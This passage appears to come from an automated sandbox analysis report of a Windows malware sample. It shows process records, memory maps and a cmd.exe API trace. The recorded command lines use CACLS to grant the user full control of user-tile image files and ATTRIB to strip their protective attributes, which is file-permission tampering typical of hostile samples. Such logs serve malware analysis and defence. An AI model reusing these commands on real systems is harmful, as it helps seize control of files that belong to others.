[0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27701 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27702 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27703 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27704 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 27705 start_va = 0x2d0000 end_va = 0x2d8fff entry_point = 0x2d0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27706 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27707 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27708 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27709 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 27710 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 
0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27711 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27712 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27713 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27714 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 27715 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 27716 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27717 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27718 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27719 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27720 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27721 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27722 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 591 os_tid = 0xfcc Thread: id = 592 os_tid = 0x7c4 Process: id = "417" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c20" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "415" os_parent_pid = "0x5dc" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27723 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27724 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27725 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27726 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 
27727 start_va = 0xb60000 end_va = 0xb66fff entry_point = 0xb60000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27728 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27729 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27730 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27731 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27732 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27733 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27734 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27735 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27736 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 27737 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 27738 start_va = 0x6dea0000 
end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27739 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27740 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27741 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27742 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27743 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27744 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27745 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27746 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 
"c:\\windows\\system32\\usp10.dll") Region: id = 27747 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27748 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27749 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27750 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 27751 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27752 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 593 os_tid = 0xa98 Process: id = "418" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x878" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" 
[0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27753 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27754 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27755 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27756 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27757 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27758 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27759 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27760 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27761 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 27762 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdf000" filename = "" Region: id = 27763 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27764 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27765 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27766 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 27767 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 27768 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27769 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27770 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27771 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27772 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 
"c:\\windows\\system32\\msvcrt.dll") Region: id = 27773 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27774 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27775 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27776 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27777 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 27778 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27779 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27780 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27781 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 27782 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 27783 start_va = 0xf0000 end_va = 0xf0fff entry_point = 
0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27784 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 27785 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 27786 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 27787 start_va = 0x13e0000 end_va = 0x16aefff entry_point = 0x13e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 594 os_tid = 0x550 [0190.021] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efbb4 | out: lpSystemTimeAsFileTime=0x2efbb4*(dwLowDateTime=0xa62abb40, dwHighDateTime=0x1d440a9)) [0190.021] GetCurrentProcessId () returned 0x878 [0190.021] GetCurrentThreadId () returned 0x550 [0190.021] GetTickCount () returned 0x3623b [0190.021] QueryPerformanceCounter (in: lpPerformanceCount=0x2efbac | out: lpPerformanceCount=0x2efbac*=24681029726) returned 1 [0190.022] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0190.022] __set_app_type (_Type=0x1) [0190.022] __p__fmode () returned 0x76b331f4 [0190.022] __p__commode () returned 0x76b331fc [0190.022] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0190.022] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0190.022] GetCurrentThreadId () returned 0x550 [0190.022] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x550) returned 0x38 [0190.022] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.022] 
GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0190.022] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.022] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0190.022] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efb44 | out: phkResult=0x2efb44*=0x0) returned 0x2 [0190.022] VirtualQuery (in: lpAddress=0x2efb7b, lpBuffer=0x2efb14, dwLength=0x1c | out: lpBuffer=0x2efb14*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.023] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efb14, dwLength=0x1c | out: lpBuffer=0x2efb14*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0190.023] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efb14, dwLength=0x1c | out: lpBuffer=0x2efb14*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0190.023] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efb14, dwLength=0x1c | out: lpBuffer=0x2efb14*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0190.023] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efb14, dwLength=0x1c | out: lpBuffer=0x2efb14*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0190.023] GetConsoleOutputCP () returned 0x1b5 [0190.023] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.023] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0190.023] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0190.023] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0190.023] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.023] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0190.023] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.023] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.023] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.023] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0190.023] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.024] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0190.024] GetEnvironmentStringsW () returned 0x470308* [0190.024] FreeEnvironmentStringsW (penv=0x470308) returned 1 [0190.024] GetEnvironmentStringsW () returned 0x470308* [0190.024] FreeEnvironmentStringsW (penv=0x470308) returned 1 [0190.024] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeab4 | out: phkResult=0x2eeab4*=0x40) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0xb8, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x1, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0x1, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | 
out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x0, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x40, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x40, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0x40, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.024] RegCloseKey (hKey=0x40) returned 0x0 [0190.024] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeab4 | out: phkResult=0x2eeab4*=0x40) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0x40, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x1, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.024] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0x1, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.025] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x0, lpcbData=0x2eeab8*=0x4) 
returned 0x0 [0190.025] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x9, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.025] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x9, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.025] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0x9, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.025] RegCloseKey (hKey=0x40) returned 0x0 [0190.025] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886398 [0190.025] srand (_Seed=0x5b886398) [0190.025] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"" [0190.025] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"" [0190.025] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.025] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x471a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0190.025] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
